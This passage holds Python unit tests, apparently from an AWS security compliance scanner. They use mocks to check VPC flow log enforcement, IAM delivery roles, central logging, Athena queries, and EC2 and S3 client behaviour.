return AwsCentralLoggingClient(s3, kms, org)
def test_get_event_bucket() -> None:
the_policy = {"banana": 1}
s3_client = Mock(
get_bucket_policy=Mock(side_effect=lambda b: the_policy if b == "cloudtrail-logs-bucket" else None)
)
actual_bucket = client(s3=s3_client).get_event_bucket()
assert actual_bucket == bucket(name="cloudtrail-logs-bucket", policy=the_policy)
def test_get_event_bucket_does_not_exist() -> None:
s3_client = Mock(get_bucket_policy=Mock(return_value=None))
assert client(s3=s3_client).get_event_bucket() is None
def test_get_event_cmk() -> None:
expected_key = key(id="74356589")
kms_client = Mock(find_key=Mock(side_effect=lambda k: expected_key if k == "74356589" else None))
actual_key = client(kms=kms_client).get_event_cmk()
assert actual_key == expected_key
def test_get_event_cmk_not_found() -> None:
kms_client = Mock(find_key=Mock(return_value=None))
assert client(kms=kms_client).get_event_cmk() is None
def test_get_all_accounts() -> None:
expected_accounts = [account("123456", "test-acc-01"), account("123456", "test-acc-01")]
org_client = Mock(get_all_accounts=Mock(return_value=expected_accounts))
assert client(org=org_client).get_all_accounts() == expected_accounts
```
#### File: clients/composite/test_aws_vpc_client.py
```python
from __future__ import annotations
from typing import Sequence, Optional, Type, Dict, Any
from src.data.aws_iam_types import Role, Policy
from src.data.aws_logs_types import LogGroup
from src.data.aws_scanner_exceptions import IamException
from unittest import TestCase
from unittest.mock import Mock
from src.clients.aws_ec2_client import AwsEC2Client
from src.clients.aws_iam_client import AwsIamClient
from src.clients.aws_kms_client import AwsKmsClient
from src.clients.aws_logs_client import AwsLogsClient
from src.clients.composite.aws_vpc_client import AwsVpcClient
from src.data.aws_compliance_actions import (
ComplianceAction,
)
from tests.test_types_generator import (
create_flow_log_action,
create_flow_log_delivery_role_action,
create_vpc_log_group_action,
delete_flow_log_action,
delete_flow_log_delivery_role_action,
delete_vpc_log_group_subscription_filter_action,
flow_log,
key,
log_group,
policy,
put_vpc_log_group_subscription_filter_action,
put_vpc_log_group_retention_policy_action,
role,
subscription_filter,
tag_flow_log_delivery_role_action,
tag_vpc_log_group_action,
vpc,
tag,
)
class TestAwsVpcClient(TestCase):
def test_list_vpcs(self) -> None:
a_key = key()
log_role = role(arn=str(flow_log().deliver_log_role_arn))
group = log_group(kms_key_id=a_key.id, kms_key=a_key)
expected_enriched_vpcs = [
vpc(
id="default-log-group-1",
flow_logs=[flow_log(deliver_log_role_arn=None, deliver_log_role=None, log_group=group)],
),
vpc(id="default-log-group-2", flow_logs=[flow_log(deliver_log_role=log_role, log_group_name=None)]),
]
client = AwsVpcClientBuilder()
client.with_default_vpc()
client.with_default_log_group()
client.with_roles([role(), role(arn=str(flow_log().deliver_log_role_arn))])
enriched = client.build().list_vpcs()
self.assertEqual(len(enriched), 2)
self.assertEqual(expected_enriched_vpcs, enriched)
class TestAwsLogDeliveryRoleCompliance(TestCase):
def test_find_flow_log_delivery_role(self) -> None:
delivery_role = role(name="vpc_flow_log_role")
client = AwsVpcClientBuilder().with_roles([delivery_role])
self.assertEqual(delivery_role, client.build()._find_flow_log_delivery_role())
def test_flow_log_role_compliant(self) -> None:
delivery_role = role(
assume_policy={"Statement": [{"Action": "sts:AssumeRole"}]},
policies=[policy(document={"Statement": [{"Effect": "Allow", "Action": ["logs:*"], "Resource": "*"}]})],
)
client = AwsVpcClientBuilder().build()
self.assertTrue(client._is_flow_log_role_compliant(delivery_role))
def test_flow_log_role_not_compliant(self) -> None:
invalid_assume_policy = role(
assume_policy={"Statement": [{"Action": "sts:other"}]},
policies=[policy(document={"Statement": [{"Effect": "Allow", "Action": ["logs:PutLogEvents"]}]})],
)
invalid_policy_document = role(
assume_policy={"Statement": [{"Action": "sts:AssumeRole"}]},
policies=[policy(document={"Statement": [{"Effect": "Allow", "Action": ["logs:bla"], "Resource": "*"}]})],
)
missing_policy_document = role(assume_policy={"Statement": [{"Action": "sts:AssumeRole"}]}, policies=[])
client = AwsVpcClientBuilder().build()
self.assertFalse(client._is_flow_log_role_compliant(invalid_assume_policy))
self.assertFalse(client._is_flow_log_role_compliant(invalid_policy_document))
self.assertFalse(client._is_flow_log_role_compliant(missing_policy_document))
def test_delivery_role_policy_exists(self) -> None:
client = AwsVpcClientBuilder()
expected_policy = policy(name="delivery_role_policy")
client.with_policies([expected_policy])
self.assertTrue(client.build()._delivery_role_policy_exists())
def test_delivery_role_policy_not_found(self) -> None:
client = AwsVpcClientBuilder()
client.with_policies([])
self.assertFalse(client.build()._delivery_role_policy_exists())
class TestAwsFlowLogCompliance(TestCase):
@staticmethod
def client() -> AwsVpcClient:
return AwsVpcClientBuilder().build()
def test_flow_log_centralised(self) -> None:
self.assertTrue(self.client()._is_flow_log_centralised(flow_log(log_group_name="/vpc/flow_log")))
def test_flow_log_not_centralised(self) -> None:
self.assertFalse(self.client()._is_flow_log_centralised(flow_log(log_group_name=None)))
self.assertFalse(self.client()._is_flow_log_centralised(flow_log(log_group_name="/vpc/something_else")))
def test_flow_log_not_misconfigured(self) -> None:
self.assertFalse(self.client()._is_flow_log_misconfigured(flow_log()))
self.assertFalse(self.client()._is_flow_log_misconfigured(flow_log(log_group_name="/vpc/something_else")))
def test_flow_log_misconfigured(self) -> None:
self.assertTrue(self.client()._is_flow_log_misconfigured(flow_log(status="a")))
self.assertTrue(self.client()._is_flow_log_misconfigured(flow_log(traffic_type="b")))
self.assertTrue(self.client()._is_flow_log_misconfigured(flow_log(log_format="c")))
self.assertTrue(self.client()._is_flow_log_misconfigured(flow_log(deliver_log_role_arn=None)))
self.assertTrue(self.client()._is_flow_log_misconfigured(flow_log(deliver_log_role_arn="bla")))
class TestAwsEnforcementActions(TestCase):
@staticmethod
def mock_action(action: Type[ComplianceAction], expected_client: Mock, applied_action: Mock) -> Mock:
return Mock(spec=action, apply=Mock(side_effect=lambda c: applied_action if c == expected_client else None))
def test_do_nothing_when_all_correct(self) -> None:
client = AwsVpcClientBuilder()
client.with_default_log_group()
client.with_roles([role()])
self.assertEqual([], client.build().enforcement_actions([vpc()], with_subscription_filter=True))
def test_create_vpc_flow_logs(self) -> None:
client = AwsVpcClientBuilder()
client.with_default_log_group()
client.with_roles([role()])
self.assertEqual(
[create_flow_log_action(vpc_id="vpc-1234")],
client.build().enforcement_actions([vpc(flow_logs=[])], with_subscription_filter=True),
)
def test_vpc_delete_redundant_centralised(self) -> None:
client = AwsVpcClientBuilder()
client.with_default_log_group()
client.with_roles([role()])
self.assertEqual(
[delete_flow_log_action(flow_log_id="2"), delete_flow_log_action(flow_log_id="3")],
client.build().enforcement_actions(
[
vpc(
flow_logs=[
flow_log("1"), # the one we want to keep
flow_log("2"), # duplicate
flow_log("3"), # duplicate
flow_log(id="unrelated_flow_log", log_group_name="unrelated flow log"),
]
)
],
with_subscription_filter=True,
),
)
def test_vpc_delete_misconfigured_centralised(self) -> None:
client = AwsVpcClientBuilder()
client.with_default_log_group()
client.with_roles([role()])
self.assertEqual(
[delete_flow_log_action(flow_log_id="1"), delete_flow_log_action(flow_log_id="3")],
client.build().enforcement_actions(
[vpc(flow_logs=[flow_log("1", status="a"), flow_log("2"), flow_log("3")])],
with_subscription_filter=True,
),
)
def test_vpc_create_centralised(self) -> None:
client = AwsVpcClientBuilder()
client.with_default_log_group()
client.with_roles([role()])
self.assertEqual(
[create_flow_log_action(vpc_id="vpc-1")],
client.build().enforcement_actions(
[vpc(id="vpc-1", flow_logs=[flow_log(log_group_name="a")])], with_subscription_filter=True
),
)
def test_vpc_delete_misconfigured_and_create_centralised(self) -> None:
client = AwsVpcClientBuilder()
client.with_default_log_group()
client.with_roles([role()])
self.assertEqual(
[delete_flow_log_action(flow_log_id="1"), create_flow_log_action(vpc_id="vpc-a")],
client.build().enforcement_actions(
[vpc(id="vpc-a", flow_logs=[flow_log(id="1", status="a")])], with_subscription_filter=True
),
)
def test_create_delivery_role_action_when_role_is_missing(self) -> None:
client = AwsVpcClientBuilder()
client.with_default_log_group()
client.with_roles([])
client.with_policies([])
self.assertEqual(
[create_flow_log_delivery_role_action(iam=client.iam), tag_flow_log_delivery_role_action(iam=client.iam)],
client.build()._delivery_role_enforcement_actions(),
)
def test_delete_and_create_delivery_role_action_when_role_is_missing_and_policy_exists(self) -> None:
client = AwsVpcClientBuilder()
client.with_default_log_group()
client.with_roles([])
client.with_policies([policy(name="delivery_role_policy")])
self.assertEqual(
[
delete_flow_log_delivery_role_action(iam=client.iam),
create_flow_log_delivery_role_action(iam=client.iam),
tag_flow_log_delivery_role_action(iam=client.iam),
],
client.build()._delivery_role_enforcement_actions(),
)
def test_delete_and_create_delivery_role_action_when_role_is_not_compliant(self) -> None:
client = AwsVpcClientBuilder()
client.with_default_log_group()
client.with_roles([role(name="vpc_flow_log_role", policies=[])])
self.assertEqual(
[
delete_flow_log_delivery_role_action(iam=client.iam),
create_flow_log_delivery_role_action(iam=client.iam),
tag_flow_log_delivery_role_action(iam=client.iam),
],
client.build()._delivery_role_enforcement_actions(),
)
def test_tag_flow_log_delivery_role_when_required_tags_missing(self) -> None:
client = AwsVpcClientBuilder()
client.with_default_log_group()
client.with_roles([role(name="vpc_flow_log_role", tags=[tag("unrelated_tag", "some value")])])
self.assertEqual(
[tag_flow_log_delivery_role_action(iam=client.iam)],
client.build()._delivery_role_enforcement_actions(),
)
def test_create_central_vpc_log_group_when_missing_with_subscription_filter(self) -> None:
client = AwsVpcClientBuilder()
client.with_log_groups([])
actions = client.build()._vpc_log_group_enforcement_actions(with_subscription_filter=True)
self.assertEqual(
[
create_vpc_log_group_action(logs=client.logs),
put_vpc_log_group_retention_policy_action(logs=client.logs),
tag_vpc_log_group_action(logs=client.logs),
put_vpc_log_group_subscription_filter_action(logs=client.logs),
],
actions,
)
def test_create_central_vpc_log_group_without_subscription_filter(self) -> None:
client = AwsVpcClientBuilder()
client.with_log_groups([])
actions = client.build()._vpc_log_group_enforcement_actions(with_subscription_filter=False)
self.assertEqual(
[
create_vpc_log_group_action(logs=client.logs),
put_vpc_log_group_retention_policy_action(logs=client.logs),
tag_vpc_log_group_action(logs=client.logs),
],
actions,
)
def test_put_subscription_filter_when_central_vpc_log_group_is_not_compliant(self) -> None:
client = AwsVpcClientBuilder()
client.with_log_groups([log_group(subscription_filters=[], default_kms_key=True)])
self.assertEqual(
[put_vpc_log_group_subscription_filter_action(logs=client.logs)],
client.build()._vpc_log_group_enforcement_actions(with_subscription_filter=True),
)
def test_put_retention_policy_when_central_vpc_log_group_does_not_have_one(self) -> None:
client = AwsVpcClientBuilder()
client.with_log_groups([log_group(retention_days=None, default_kms_key=True)])
self.assertEqual(
[put_vpc_log_group_retention_policy_action(logs=client.logs)],
client.build()._vpc_log_group_enforcement_actions(with_subscription_filter=True),
)
def test_put_retention_policy_when_central_vpc_log_group_retention_differs_from_config(self) -> None:
client = AwsVpcClientBuilder()
client.with_log_groups([log_group(retention_days=21, default_kms_key=True)])
self.assertEqual(
[put_vpc_log_group_retention_policy_action(logs=client.logs)],
client.build()._vpc_log_group_enforcement_actions(with_subscription_filter=True),
)
def test_tag_vpc_log_group_when_tags_missing(self) -> None:
client = AwsVpcClientBuilder()
client.with_log_groups([log_group(tags=[tag("unrelated_tag", "1")], default_kms_key=True)])
self.assertEqual(
[tag_vpc_log_group_action(logs=client.logs)],
client.build()._vpc_log_group_enforcement_actions(with_subscription_filter=True),
)
def test_no_central_vpc_log_group_action_when_log_group_is_compliant(self) -> None:
client = AwsVpcClientBuilder()
client.with_default_log_group()
self.assertEqual([], client.build()._vpc_log_group_enforcement_actions(with_subscription_filter=True))
def test_delete_subscription_filter_when_exists_and_not_required(self) -> None:
client = AwsVpcClientBuilder()
client.with_default_log_group()
self.assertEqual(
[delete_vpc_log_group_subscription_filter_action(logs=client.logs)],
client.build()._vpc_log_group_enforcement_actions(with_subscription_filter=False),
)
class TestLogGroupCompliance(TestCase):
def test_central_vpc_log_group(self) -> None:
self.assertTrue(
AwsVpcClientBuilder()
.build()
._is_central_vpc_log_group(
log_group(
name="/vpc/flow_log",
subscription_filters=[
subscription_filter(
filter_pattern="[version, account_id, interface_id]",
destination_arn="arn:aws:logs:::destination:central",
)
],
)
)
)
def test_log_group_is_not_vpc_central(self) -> None:
client = AwsVpcClientBuilder().build()
self.assertFalse(client._is_central_vpc_log_group(log_group(name="/vpc/something_else")))
self.assertFalse(client._is_central_vpc_log_group(log_group(subscription_filters=[])))
self.assertFalse(
client._is_central_vpc_log_group(
log_group(subscription_filters=[subscription_filter(filter_pattern="something")])
)
)
self.assertFalse(
client._is_central_vpc_log_group(
log_group(subscription_filters=[subscription_filter(destination_arn="somewhere")])
)
)
class AwsVpcClientBuilder(TestCase):
def __init__(self) -> None:
super().__init__()
self.ec2 = Mock(spec=AwsEC2Client, wraps=AwsEC2Client(Mock()))
self.iam = Mock(spec=AwsIamClient, wraps=AwsIamClient(Mock()))
self.logs = Mock(spec=AwsLogsClient, wraps=AwsLogsClient(Mock()))
self.kms = Mock(spec=AwsKmsClient, wraps=AwsKmsClient(Mock()))
def with_default_vpc(self) -> AwsVpcClientBuilder:
vpcs = [
vpc(id="default-log-group-1", flow_logs=[flow_log(deliver_log_role_arn=None)]),
vpc(id="default-log-group-2", flow_logs=[flow_log(log_group_name=None)]),
]
self.ec2.list_vpcs.return_value = vpcs
return self
def with_default_key(self) -> AwsVpcClientBuilder:
self.kms.get_key.side_effect = lambda k: key() if k == key().id else self.fail(f"expected {key().id}, got {k}")
return self
def with_default_log_group(self) -> AwsVpcClientBuilder:
self.with_log_groups([log_group(kms_key_id=key().id)])
return self
def with_log_groups(self, log_groups: Sequence[LogGroup]) -> AwsVpcClientBuilder:
def describe_log_groups(name_prefix: str) -> Sequence[LogGroup]:
return list(filter(lambda log_group: log_group.name.startswith(name_prefix), log_groups))
self.logs.describe_log_groups.side_effect = describe_log_groups
self.with_default_key()
return self
def with_roles(self, roles: Sequence[Role]) -> AwsVpcClientBuilder:
def get_role(name: str) -> Optional[Role]:
result = next(filter(lambda a_role: a_role.name == name, roles), None)
if result is None:
raise IamException(f"cannot find {name} in {roles}")
return result
def find_role_by_name(name: str) -> Optional[Role]:
result = filter(lambda role: role.name == name, roles)
return next(result, None)
def find_role_by_arn(arn: str) -> Optional[Role]:
result = filter(lambda role: role.arn == arn, roles)
return next(result, None)
self.iam.get_role.side_effect = get_role
self.iam.find_role.side_effect = find_role_by_name
self.iam.find_role_by_arn.side_effect = find_role_by_arn
return self
def with_policies(self, policies: Sequence[Policy]) -> AwsVpcClientBuilder:
def find_policy_arn(name: str) -> Optional[str]:
result = next(filter(lambda p: p.name == name, policies), None)
return result.arn if result else None
self.iam.find_policy_arn.side_effect = find_policy_arn
return self
def build(self) -> AwsVpcClient:
return AwsVpcClient(self.ec2, self.iam, self.logs, self.kms)
def with_create_role(self, expected_role: Role) -> AwsVpcClientBuilder:
def create_role(name: str, assume_policy: Dict[str, Any]) -> Role:
self.assertEqual(expected_role.name, name, "The expected mocked role name did not match what was called")
self.assertEqual(
expected_role.assume_policy,
assume_policy,
"The expected mocked role assume_policy did not match what was called",
)
return expected_role
self.iam.create_role.side_effect = create_role
return self
def with_create_policies(self, expected_policies: Sequence[Policy]) -> AwsVpcClientBuilder:
def create_policy(name: str, document: Dict[str, Any]) -> Policy:
found_policies: Sequence[Policy] = list(filter(lambda p: p.name == name, expected_policies))
self.assertTrue(
len(found_policies) == 1,
f"did not find a unique policy with name '{name}' in expected policies {expected_policies}",
)
found_policy: Policy = next(iter(found_policies))
self.assertEqual(
found_policy.document, document, "The expected mocked policy document did not match what was called"
)
return found_policy
self.iam.create_policy.side_effect = create_policy
return self
def with_attach_role_policy(self, expected_role: Role) -> AwsVpcClientBuilder:
def attach_role_policy(role: Role, policy_arn: str) -> None:
self.assertEqual(role.name, expected_role.name)
self.assertIn(policy_arn, [p.arn for p in expected_role.policies])
return None
self.iam.attach_role_policy.side_effect = attach_role_policy
return self
def with_create_flow_logs(self) -> AwsVpcClientBuilder:
self.ec2.create_flow_logs.return_value = None
return self
```
#### File: tests/clients/test_aws_athena_client.py
```python
from unittest import TestCase
from unittest.mock import Mock, call, patch
from typing import Any, Dict, Type
from src.data import aws_scanner_exceptions as exceptions
from src.clients.aws_athena_client import AwsAthenaClient
from tests.test_types_generator import account, partition
class TestWaitFor(TestCase):
def test_wait_for_completion(self) -> None:
query_id = "8759-2768-2364"
mock_has_query_completed = Mock(side_effect=[False, False, True])
with patch(
"src.clients.aws_athena_async_client.AwsAthenaAsyncClient.has_query_completed", mock_has_query_completed
):
AwsAthenaClient(Mock())._wait_for_completion(query_id, 60)
mock_has_query_completed.assert_has_calls([call(query_id) for _ in range(3)])
def test_wait_for_completion_timeout(self) -> None:
query_id = "9837-4857-3576"
mock_has_query_completed = Mock(return_value=False)
with patch(
"src.clients.aws_athena_async_client.AwsAthenaAsyncClient.has_query_completed", mock_has_query_completed
):
with self.assertRaises(exceptions.TimeoutException) as ex:
AwsAthenaClient(Mock())._wait_for_completion(query_id, 30)
mock_has_query_completed.assert_has_calls([call(query_id) for _ in range(30)])
self.assertIn(query_id, ex.exception.args[0])
def test_wait_for_success(self) -> None:
query_id = "9847-2919-2284"
timeout = 74
query_results = ["some results"]
mock_wait_for_completion = Mock(return_value=None)
mock_query_succeeded = Mock(return_value=True)
mock_query_results = Mock(return_value=query_results)
with patch("src.clients.aws_athena_client.AwsAthenaClient._wait_for_completion", mock_wait_for_completion):
with patch(
"src.clients.aws_athena_async_client.AwsAthenaAsyncClient.has_query_succeeded", mock_query_succeeded
):
with patch(
"src.clients.aws_athena_async_client.AwsAthenaAsyncClient.get_query_results", mock_query_results
):
actual_results = AwsAthenaClient(Mock())._wait_for_success(query_id, timeout, Exception)
self.assertEqual(query_results, actual_results)
mock_wait_for_completion.assert_called_once_with(query_id, timeout)
mock_query_succeeded.assert_called_once_with(query_id)
def test_wait_for_success_query_does_not_succeed(self) -> None:
mock_wait_for_completion = Mock(return_value=None)
mock_query_succeeded = Mock(return_value=False)
query_error = "the query failed for some reasons"
mock_get_query_error = Mock(return_value=query_error)
with patch("src.clients.aws_athena_client.AwsAthenaClient._wait_for_completion", mock_wait_for_completion):
with patch(
"src.clients.aws_athena_async_client.AwsAthenaAsyncClient.has_query_succeeded", mock_query_succeeded
):
with patch(
"src.clients.aws_athena_async_client.AwsAthenaAsyncClient.get_query_error", mock_get_query_error
):
with self.assertRaises(exceptions.RunQueryException) as ex:
AwsAthenaClient(Mock())._wait_for_success("9847-2919-2284", 74, exceptions.RunQueryException)
self.assertIn(query_error, ex.exception.args)
@patch("src.clients.aws_athena_client.AwsAthenaClient._wait_for_success")
class TestQueries(TestCase):
def test_create_database(self, mock_wait_for_success: Mock) -> None:
self.assert_wait_for_success(
mock_wait_for_success=mock_wait_for_success,
method_under_test="create_database",
method_args={"database_name": "some_db_name"},
timeout_seconds=1200,
raise_on_failure=exceptions.CreateDatabaseException,
)
def test_drop_database(self, mock_wait_for_success: Mock) -> None:
self.assert_wait_for_success(
mock_wait_for_success=mock_wait_for_success,
method_under_test="drop_database",
method_args={"database_name": "some_db_name"},
timeout_seconds=1200,
raise_on_failure=exceptions.DropDatabaseException,
)
def test_create_table(self, mock_wait_for_success: Mock) -> None:
self.assert_wait_for_success(
mock_wait_for_success=mock_wait_for_success,
method_under_test="create_table",
method_args={"database": "some_db", "account": account()},
timeout_seconds=1200,
raise_on_failure=exceptions.CreateTableException,
)
def test_drop_table(self, mock_wait_for_success: Mock) -> None:
self.assert_wait_for_success(
mock_wait_for_success=mock_wait_for_success,
method_under_test="drop_table",
method_args={"database": "some_db", "table": "some_account_id"},
timeout_seconds=1200,
raise_on_failure=exceptions.DropTableException,
)
def test_add_partition(self, mock_wait_for_success: Mock) -> None:
self.assert_wait_for_success(
mock_wait_for_success=mock_wait_for_success,
method_under_test="add_partition",
method_args={
"database": "some_db",
"account": account(),
"partition": partition(2020, 8),
},
timeout_seconds=1200,
raise_on_failure=exceptions.AddPartitionException,
)
def test_run_query(self, mock_wait_for_success: Mock) -> None:
self.assert_wait_for_success(
mock_wait_for_success=mock_wait_for_success,
method_under_test="run_query",
method_args={"database": "some_db", "query": "SELECT something FROM somewhere"},
timeout_seconds=1200,
raise_on_failure=exceptions.RunQueryException,
return_results=True,
)
def assert_wait_for_success(
self,
mock_wait_for_success: Mock,
method_under_test: str,
method_args: Dict[str, Any],
timeout_seconds: int,
raise_on_failure: Type[Exception],
return_results: bool = False,
) -> None:
query_id = "1536-4938-3968"
query_results = ["some query results"]
mock_wait_for_success.return_value = query_results
mock_method_under_test = Mock(return_value=query_id)
with patch(f"src.clients.aws_athena_client.AwsAthenaAsyncClient.{method_under_test}", mock_method_under_test):
actual_results = getattr(AwsAthenaClient(Mock()), method_under_test)(**method_args)
mock_method_under_test.assert_called_once_with(**method_args)
mock_wait_for_success.assert_called_once_with(
query_id=query_id,
timeout_seconds=timeout_seconds,
raise_on_failure=raise_on_failure,
)
if return_results:
self.assertEqual(query_results, actual_results)
class TestList(TestCase):
def test_list_databases(self) -> None:
dbs = ["db1", "db2", "db3"]
mock_athena_async = Mock(list_databases=Mock(return_value=dbs))
client = AwsAthenaClient(Mock())
with patch.object(client, "_athena_async", mock_athena_async):
self.assertEqual(dbs, client.list_databases())
def test_list_tables(self) -> None:
tables = ["table1", "table2", "table3"]
mock_athena_async = Mock(list_tables=Mock(side_effect=lambda db: tables if db == "some_database" else []))
client = AwsAthenaClient(Mock())
with patch.object(client, "_athena_async", mock_athena_async):
self.assertEqual(tables, client.list_tables("some_database"))
```
#### File: tests/clients/test_aws_ec2_client.py
```python
import logging
import pytest
from unittest import TestCase
from unittest.mock import Mock, patch
from typing import Any, Dict
from src.clients.aws_ec2_client import AwsEC2Client
from src.data.aws_ec2_types import Vpc
from src.data.aws_scanner_exceptions import EC2Exception
from tests import _raise
from tests.clients import test_aws_ec2_client_responses as responses
from tests.test_types_generator import client_error, flow_log, vpc
def test_list_vpcs() -> None:
ec2 = AwsEC2Client(Mock())
with patch.object(ec2, "_describe_flow_logs", side_effect=lambda v: [flow_log()] if v.id == vpc().id else None):
with patch.object(ec2, "_describe_vpcs", return_value=[vpc()]):
assert [vpc(flow_logs=[flow_log()])] == ec2.list_vpcs()
def test_describe_vpcs_empty() -> None:
ec2_client = AwsEC2Client(Mock(describe_vpcs=Mock(return_value={"Vpcs": []})))
assert [] == ec2_client._describe_vpcs()
def test_describe_vpcs() -> None:
vpcs = [{"VpcId": "vpc-12312e654bf654d12"}, {"VpcId": "vpc-984a4654b65465e12"}]
ec2_client = AwsEC2Client(Mock(describe_vpcs=Mock(return_value={"Vpcs": vpcs})))
assert [Vpc("vpc-12312e654bf654d12"), Vpc("vpc-984a4654b65465e12")] == ec2_client._describe_vpcs()
def test_describe_vpcs_failure(caplog: Any) -> None:
error = client_error("DescribeVpcs", "AccessDenied", "Access Denied")
ec2_client = AwsEC2Client(Mock(describe_vpcs=Mock(side_effect=error)))
with caplog.at_level(logging.INFO):
assert [] == ec2_client._describe_vpcs()
assert "AccessDenied" in caplog.text
def describe_flow_logs(**kwargs: Any) -> Dict[Any, Any]:
assert "resource-id" == kwargs["Filters"][0]["Name"]
flow_log_config = kwargs["Filters"][0]["Values"][0]
if flow_log_config == "vpc-error":
raise client_error("DescribeFlowLogs", "AccessDenied", "Access Denied")
return {
"vpc-no-flow-logs": responses.EMPTY_FLOW_LOGS,
"vpc-with-flow-logs": responses.FLOW_LOGS,
}[flow_log_config]
def ec2_client() -> AwsEC2Client:
return AwsEC2Client(
Mock(
describe_flow_logs=Mock(side_effect=describe_flow_logs), delete_flow_logs=Mock(side_effect=delete_flow_logs)
)
)
def test_describe_flow_logs_empty() -> None:
assert [] == ec2_client()._describe_flow_logs(Vpc("vpc-no-flow-logs"))
def test_describe_flow_logs() -> None:
assert responses.EXPECTED_FLOW_LOGS == ec2_client()._describe_flow_logs(Vpc("vpc-with-flow-logs"))
def test_describe_flow_logs_failure(caplog: Any) -> None:
with caplog.at_level(logging.INFO):
assert [] == ec2_client()._describe_flow_logs(Vpc("vpc-error"))
assert "AccessDenied" in caplog.text
assert "vpc-error" in caplog.text
class TestAwsEC2ClientCreateFlowLogs(TestCase):
EXPECTED_TAGS = [
{
"ResourceType": "vpc-flow-log",
"Tags": [
{"Key": "allow-management-by-platsec-scanner", "Value": "true"},
{"Key": "src-repo", "Value": "https://github.com/hmrc/platsec-aws-scanner"},
],
}
]
def create_flow_logs(self, **kwargs: Any) -> Any:
self.assertEqual("VPC", kwargs["ResourceType"])
self.assertEqual("ALL", kwargs["TrafficType"])
self.assertEqual("cloud-watch-logs", kwargs["LogDestinationType"])
self.assertEqual("${srcaddr} ${dstaddr}", kwargs["LogFormat"])
self.assertEqual(self.EXPECTED_TAGS, kwargs["TagSpecifications"])
self.assertEqual(8, len(kwargs), f"expected 8 arguments passed to create_flow_logs function, got {len(kwargs)}")
resp_mapping: Dict[Any, Any] = {
("good-vpc", "lg-1", "perm-1"): lambda: responses.CREATE_FLOW_LOGS_SUCCESS,
("bad-vpc", "lg-2", "perm-2"): lambda: responses.CREATE_FLOW_LOGS_FAILURE,
("except-vpc", "lg-3", "perm-3"): lambda: _raise(client_error("CreateFlowLogs", "AccessDenied", "nope")),
}
return resp_mapping[(kwargs["ResourceIds"][0], kwargs["LogGroupName"], kwargs["DeliverLogsPermissionArn"])]()
def ec2_client(self) -> AwsEC2Client:
return AwsEC2Client(Mock(create_flow_logs=Mock(side_effect=self.create_flow_logs)))
def test_create_flow_logs(self) -> None:
self.ec2_client().create_flow_logs("good-vpc", "lg-1", "perm-1")
def test_create_flow_logs_failure(self) -> None:
with self.assertRaisesRegex(EC2Exception, "bad-vpc"):
self.ec2_client().create_flow_logs("bad-vpc", "lg-2", "perm-2")
def test_create_flow_logs_client_error(self) -> None:
with self.assertRaisesRegex(EC2Exception, "except-vpc"):
self.ec2_client().create_flow_logs("except-vpc", "lg-3", "perm-3")
def delete_flow_logs(**kwargs: Any) -> Any:
flow_log: Dict[str, Any] = {
"good-fl": lambda: responses.DELETE_FLOW_LOGS_SUCCESS,
"fl-not-found": lambda: responses.DELETE_FLOW_LOGS_FAILURE,
"bad-fl": lambda: _raise(client_error("DeleteFlowLogs", "AccessDenied", "Access Denied")),
}
return flow_log[kwargs["FlowLogIds"][0]]()
def test_delete_flow_logs() -> None:
ec2_client().delete_flow_logs(flow_log_id="good-fl")
def test_delete_flow_logs_not_found() -> None:
    with pytest.raises(EC2Exception, match="fl-not-found"):
ec2_client().delete_flow_logs(flow_log_id="fl-not-found")
def test_delete_flow_logs_failure() -> None:
with pytest.raises(EC2Exception, match="bad-fl"):
ec2_client().delete_flow_logs(flow_log_id="bad-fl")
```
#### File: tests/clients/test_aws_s3_client.py
```python
import logging
from unittest.mock import Mock
from typing import Any, Dict, Sequence
from src.clients.aws_s3_client import AwsS3Client
from tests import _raise
from tests.clients import test_aws_s3_client_responses as responses
from tests.test_types_generator import (
bucket,
bucket_acl,
bucket_content_deny,
bucket_cors,
bucket_data_tagging,
bucket_encryption,
bucket_lifecycle,
bucket_logging,
bucket_mfa_delete,
bucket_public_access_block,
bucket_secure_transport,
bucket_versioning,
client_error,
)
def test_list_buckets() -> None:
client = AwsS3Client(Mock(list_buckets=Mock(return_value=responses.LIST_BUCKETS)))
expected_buckets = [bucket("a-bucket"), bucket("another-bucket")]
assert expected_buckets == client.list_buckets()
def get_bucket_acl(**kwargs: Dict[str, Any]) -> Any:
bucket = str(kwargs["Bucket"])
if bucket == "access-denied":
raise client_error("GetBucketAcl", "AccessDenied", "Access Denied")
acl: Dict[str, Any] = {
"no-grant": responses.GET_BUCKET_ACL_NO_GRANT,
"owner-grant": responses.GET_BUCKET_ACL_OWNER_GRANT,
"all-users-grant": responses.GET_BUCKET_ACL_ALL_USERS_GRANT,
"authenticated-users-grant": responses.GET_BUCKET_ACL_AUTHENTICATED_USERS_GRANT,
}
return acl[bucket]
def s3_client_acl() -> AwsS3Client:
return AwsS3Client(Mock(get_bucket_acl=Mock(side_effect=get_bucket_acl)))
def test_get_bucket_acl_no_grant() -> None:
acl = bucket_acl(all_users_enabled=False, authenticated_users_enabled=False)
assert acl == s3_client_acl().get_bucket_acl("no-grant")
def test_get_bucket_acl_owner_grant() -> None:
acl = bucket_acl(all_users_enabled=False, authenticated_users_enabled=False)
assert acl == s3_client_acl().get_bucket_acl("owner-grant")
def test_get_bucket_acl_all_users_grant() -> None:
acl = bucket_acl(all_users_enabled=True, authenticated_users_enabled=False)
assert acl == s3_client_acl().get_bucket_acl("all-users-grant")
def test_get_bucket_acl_authenticated_users_grant() -> None:
acl = bucket_acl(all_users_enabled=False, authenticated_users_enabled=True)
assert acl == s3_client_acl().get_bucket_acl("authenticated-users-grant")
def test_get_bucket_acl_failure(caplog: Any) -> None:
acl = bucket_acl(all_users_enabled=True, authenticated_users_enabled=True)
with caplog.at_level(logging.WARNING):
assert acl == s3_client_acl().get_bucket_acl("access-denied")
assert "AccessDenied" in caplog.text
def get_bucket_policy(**kwargs: Dict[str, Any]) -> Any:
bucket_config = str(kwargs["Bucket"])
if bucket_config == "access-denied":
raise client_error("GetBucketPolicy", "AccessDenied", "Access Denied")
policy_mapping: Dict[str, Any] = {
"deny-single": responses.GET_BUCKET_POLICY_DENY_GET_PUT_DELETE_SINGLE_STATEMENT,
"deny-separate": responses.GET_BUCKET_POLICY_DENY_GET_PUT_DELETE_SEPARATE_STATEMENTS,
"deny-mixed": responses.GET_BUCKET_POLICY_DENY_GET_PUT_DELETE_MIXED_STATEMENTS,
"deny-incomplete": responses.GET_BUCKET_POLICY_DENY_GET_PUT_SINGLE_STATEMENT,
"deny-incomplete-separate": responses.GET_BUCKET_POLICY_DENY_GET_DELETE_SEPARATE_STATEMENTS,
